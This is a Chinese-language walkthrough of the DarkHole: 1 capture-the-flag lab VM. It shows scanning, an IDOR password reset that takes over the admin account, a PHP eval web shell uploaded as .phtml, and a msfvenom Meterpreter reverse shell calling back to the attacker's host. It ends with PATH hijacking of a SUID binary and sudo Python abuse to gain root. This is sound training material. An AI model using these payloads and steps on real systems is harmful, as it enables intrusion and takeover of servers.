DarkHole: 1
端口扫描主机发现
探测存活主机,
184是靶机1
2
3
4
5
6
7
8
9
10
11
12
13
14
15nmap -sP 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 09:59 CST
Nmap scan report for 192.168.75.1
Host is up (0.00027s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.184
Host is up (0.00032s latency).
MAC Address: 00:0C:29:61:C5:52 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:FE:CA:7A (VMware)
Nmap scan report for 192.168.75.151探测主机所有开放端口
1
2
3
4
5
6
7
8
9nmap -sT -min-rate 10000 -p- 192.168.75.184
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 09:59 CST
Nmap scan report for 192.168.75.184
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:61:C5:52 (VMware)探测服务版本以及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16nmap -sV -sT -O -p 80,22 192.168.75.184
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 09:59 CST
Nmap scan report for 192.168.75.184
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:61:C5:52 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27nmap -script=vuln -p 80,22 192.168.75.184
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 10:00 CST
Nmap scan report for 192.168.75.184
Host is up (0.00057s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.184
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /login.php: Possible admin folder
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
MAC Address: 00:0C:29:61:C5:52 (VMware)
web渗透
访问主页,存在登录页面链接
先扫描目录看看
1
2
3
4
5
6
7
8
9
10
11
12
13
14dirsearch -u http://192.168.75.184 -x 403,404
//
[10:07:48] Starting:
[10:07:48] 301 - 313B - /js -> http://192.168.75.184/js/
[10:08:10] 301 - 317B - /config -> http://192.168.75.184/config/
[10:08:10] 200 - 460B - /config/
[10:08:11] 301 - 314B - /css -> http://192.168.75.184/css/
[10:08:12] 200 - 21B - /dashboard.php
[10:08:21] 200 - 487B - /js/
[10:08:23] 200 - 1KB - /login.php
[10:08:24] 302 - 0B - /logout.php -> login.php
[10:08:35] 200 - 1KB - /register.php
[10:08:45] 301 - 317B - /upload -> http://192.168.75.184/upload/
[10:08:45] 200 - 456B - /upload//dashboard.php无权限/upload上传文件夹/config存在database.php
登陆页面存在注册,我们注册用户
test登录进去后发现可以
update信息以及更改密码,感觉会存在注入
测试是否存在注入
Details Update部分使用
sql测试没找到注入点Password Change部分这部分没注入….但是修改密码区域可以抓包将传入的
id值修改,我们可以将其修改为id=1的用户(可能是管理用户)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17POST /dashboard.php?id=2 HTTP/1.1
Host: 192.168.75.184
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Origin: http://192.168.75.184
Sec-GPC: 1
Connection: keep-alive
Referer: http://192.168.75.184/dashboard.php?id=2
Cookie: PHPSESSID=aal4svnq3poomufcq5sv2lo2fu
Upgrade-Insecure-Requests: 1
Priority: u=0, i
password=123456&id=1成功将包发送,提示
Password has been change
登陆后台,用户名使用
admin,密码是用修改后的123456,成功进入
多了个上传文件框
尝试文件上传上传🐎
直接上传
2.php,内容是一句马,提示:Sorry , Allow Ex : jpg,png,gif看着像是白名单尝试了一下,不只是可以上传
jpg,png,gif,也可以上传别的后缀文件,所以更像是把php类的文件后缀放进黑名单了这里涉及到一些文件上传
CTF的套路,我们将php改为其他可以解释为php文件的后缀,我将其修改为phtml,上传成功(我是抓包后修改的,也可以直接修改文件后缀然后直接上传)1
2
3
4Content-Disposition: form-data; name="fileToUpload"; filename="2.phtml"
Content-Type: application/octet-stream
<?php @eval($_POST[x]); ?>上传的文件保存在了
/upload路径,测试能否使用
可以正常包含
使用蚁🗡连接
提权
我们先反弹
shell,靶机自带的nc不支持-e,所以我们需要上传反弹shell脚本然后包含生成脚本
1
2
3
4
5msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.75.151 lport=1234 -f raw > getshell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1115 bytes在蚁🗡将脚本上传
upload文件夹里
kali打开msf监听1
2
3
4
5
6
7
8
9msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.75.151
lhost => 192.168.75.151
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > run网页访问上传的脚本文件
获得
shell1
2
3
4
5[*] Started reverse TCP handler on 192.168.75.151:1234
[*] Sending stage (39927 bytes) to 192.168.75.184
[*] Meterpreter session 1 opened (192.168.75.151:1234 -> 192.168.75.184:55480) at 2024-11-08 11:49:08 +0800
meterpreter >输入shell获得shell命令行
查看权限
1
2
3
4
5
6$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux寻找利用点
SUID权限
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/at
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/home/john/toto/home/john/toto这个一看就不对劲数据库配置文件
1
2
3$ cat database.php
<?php
$connect = new mysqli("localhost",'john','john','darkhole');可以尝试密码碰撞
ssh,但是密码错误
来到
/home/john/,下有四个文件1
2
3
4
5$ ls
file.py
password
toto
user.txt但是除了
toto有读和执行权限,别的都没有权限,前面suid也搜索出了toto,尝试利用利用
toto因为不知道有什么作用,我们直接执行
1
2$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)我们通过蚁🗡下载该文件下来,使用
IDA反编译看看写了啥1
2
3
4
5
6int __fastcall main(int argc, const char **argv, const char **envp)
{
setuid(0x3E9u);
setgid(0x3E9u);
return system("id");
}设置
UID然后设置GID最后输出ID命令劫持环境变量
因为他会执行
id,所以我们修改环境变量让他执行id的时候执行/bin/bash1
2
3$ echo "/bin/bash" > /tmp/id
$ chmod 777 /tmp/id
$ export PATH=/tmp:$PATH$ export PATH=/tmp:PATH设置/tmp为环境变量的开头,那样就可以一开始就去/tmp寻找id也就是/bin/bash执行
toto,获得john的shell1
2$ ./toto
john@darkhole:/home/john$
获得
john的用户后查看之前没权限看的文件password是john的密码,我们用它去ssh登录john获得更好的用户交互shell1
2john@darkhole:~$ cat password
root123file.py是空的1
2ohn@darkhole:~$ cat file.py
user.txt一个flag1
2john@darkhole:~$ cat user.txt
DarkHole{You_Can_DO_It}
寻找利用点
查看
sudo权限1
2
3
4
5
6
7john@darkhole:~$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on darkhole:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on darkhole:
(root) /usr/bin/python3 /home/john/file.py可以使用
root权限执行file.py文件,哦豁,可以提权了编辑
file.py文件,将提权语句写入file.py1
ehco "import os;os.system('/bin/bash');" >> file.py
使用
sudo权限执行1
2john@darkhole:~$ sudo /usr/bin/python3 /home/john/file.py
root@darkhole:获得root!!!
读取
flag文件1
2root@darkhole:~# cat root.txt
DarkHole{You_Are_Legend}